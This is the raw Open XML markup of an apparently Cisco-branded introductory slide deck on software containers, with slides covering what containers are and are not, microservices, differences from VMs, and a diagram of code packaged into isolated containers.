<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.cisco.com/modeling-labs/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide35.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout54.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.eve-ng.net/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.gns3.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.cisco.com/pyats/"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54.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7.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.jpg"/></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EF665-0935-42E1-9339-85CB3664B3C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1352550"/>
            <a:ext cx="7598042" cy="1723524"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>An Introduction to Containers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6107D26-D4A2-490F-BDE9-401E7F1EF2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8294" y="213670"/>
            <a:ext cx="941388" cy="585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893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EF665-0935-42E1-9339-85CB3664B3C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1885950"/>
            <a:ext cx="7598042" cy="1069026"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:br>
              <a:rPr lang="en-US" sz="4050" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4050" dirty="0"/>
              <a:t>So what are containers?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20793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noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A way to package up our applications and dependencies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A way to guarantee execution consistency and portability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A way to keep your applications isolated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A way to use your compute resources without the overhead of VM’s.</a:t>
            </a:r>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a:t>Containers are...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="282924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57149" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Microservices</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We hear containers and microservices used a lot together. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microservices benefit from a light-weight packaging, distribution, and deployment solution.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, you can package anything into a container, including a badly written legacy app in some cases, using containers doesn’t magically make bad code better.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Containers are not...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="57149" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>VM’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sounds obvious, but worth remembering they are different.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Containers are purely user-space, if you need kernel extensions/modules or a custom kernel, containers probably aren't what you’re looking for.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264476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37766" y="167844"/>
            <a:ext cx="8345488" cy="871407"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Container</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="512803" y="835025"/>
            <a:ext cx="8631197" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Business: Doing things faster, realizing value using new tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2509645" y="1270268"/>
            <a:ext cx="888619" cy="93793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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005073"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Container</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1693880" y="1524406"/>
            <a:ext cx="660400"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Title 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="347056" y="1359882"/>
            <a:ext cx="1477478" cy="848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defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Your code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="513160"/>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="282828"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Your startup scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="513160"/>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="282828"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="513160"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Code Dependencies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1693880" y="1783459"/>
            <a:ext cx="660400"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693880" y="2045372"/>
            <a:ext cx="660400"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465642" y="1820566"/>
            <a:ext cx="861460" cy="6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397626" y="1347877"/>
            <a:ext cx="1034715" cy="501676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Versioned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="685800">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Standardized* Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Can 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4394480" y="1270268"/>
            <a:ext cx="726707" cy="953711"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005073"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Container</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="685800"/>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005073"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Repository</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Arrow Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5121186" y="2030568"/>
            <a:ext cx="1171738" cy="32590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121187" y="1767827"/>
            <a:ext cx="1155031" cy="1289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121187" y="1186646"/>
            <a:ext cx="1155031" cy="40223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6385970" y="960405"/>
            <a:ext cx="573641" cy="4524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700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005073"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Container</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6385970" y="1560097"/>
            <a:ext cx="573641" cy="4524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700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005073"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Container</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6385970" y="2170424"/>
            <a:ext cx="573641" cy="4524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700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005073"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Container</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7361330" y="955056"/>
            <a:ext cx="573641" cy="4524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700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005073"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Container</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Rectangle 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7361330" y="1554481"/>
            <a:ext cx="573641" cy="4524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700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005073"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Container</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rectangle 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7361329" y="2170423"/>
            <a:ext cx="573641" cy="4524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700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005073"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Container</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="40" name="Straight Arrow Connector 39"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="32" idx="3"/>
            <a:endCxn id="35" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6959611" y="1181297"/>
            <a:ext cx="401719" cy="5349"/>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quot;No&quot; Symbol 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7044966" y="1004564"/>
            <a:ext cx="231006" cy="240631"/>
          </a:xfrm>
          <a:prstGeom prst="noSmoking">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="514337"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" err="1">
              <a:solidFill>
                <a:srgbClr val="005073"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
              <a:ea typeface="Arial" pitchFamily="-107" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="-107" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="-107" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="44" name="Straight Arrow Connector 43"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6966296" y="1826614"/>
            <a:ext cx="388348" cy="31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quot;No&quot; Symbol 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7045969" y="1653012"/>
            <a:ext cx="223317" cy="240631"/>
          </a:xfrm>
          <a:prstGeom prst="noSmoking">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="514337"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" err="1">
              <a:solidFill>
                <a:srgbClr val="005073"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
              <a:ea typeface="Arial" pitchFamily="-107" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="-107" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="-107" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47" name="Straight Arrow Connector 46"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6965294" y="2406137"/>
            <a:ext cx="388348" cy="3133"/>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quot;No&quot; Symbol 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7044967" y="2232535"/>
            <a:ext cx="223317" cy="240631"/>
          </a:xfrm>
          <a:prstGeom prst="noSmoking">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="514337"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" err="1">
              <a:solidFill>
                <a:srgbClr val="005073"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
              <a:ea typeface="Arial" pitchFamily="-107" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="-107" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="-107" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Rounded Rectangle 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6333970" y="906978"/>
            <a:ext cx="2372627" cy="542024"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:shade val="95000"/>
                <a:satMod val="105000"/>
                <a:alpha val="76000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="514337"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" err="1">
              <a:solidFill>
                <a:srgbClr val="005073"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
              <a:ea typeface="Arial" pitchFamily="-107" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="-107" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="-107" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="TextBox 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8010368" y="1068629"/>
            <a:ext cx="620829" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>User A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Rounded Rectangle 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6333970" y="1510870"/>
            <a:ext cx="2372627" cy="542024"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:shade val="95000"/>
                <a:satMod val="105000"/>
                <a:alpha val="76000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="514337"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" err="1">
              <a:solidFill>
                <a:srgbClr val="005073"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
              <a:ea typeface="Arial" pitchFamily="-107" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="-107" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="-107" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="TextBox 52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8010368" y="1672523"/>
            <a:ext cx="620829" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="685800">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="282828"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>User B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Rounded Rectangle 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6333970" y="2126110"/>
            <a:ext cx="2372627" cy="542024"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat">
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:shade val="95000"/>
                <a:satMod val="105000"/>
                <a:alpha val="76000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="sysDash"/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="514337"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" err="1">
              <a:solidFill>
                <a:srgbClr val="005073"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
              <a:ea typeface="Arial" pitchFamily="-107" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="-107" charset="0"/>
              <a:sym typeface="Arial" pitchFamily="-107" charset="0"/>
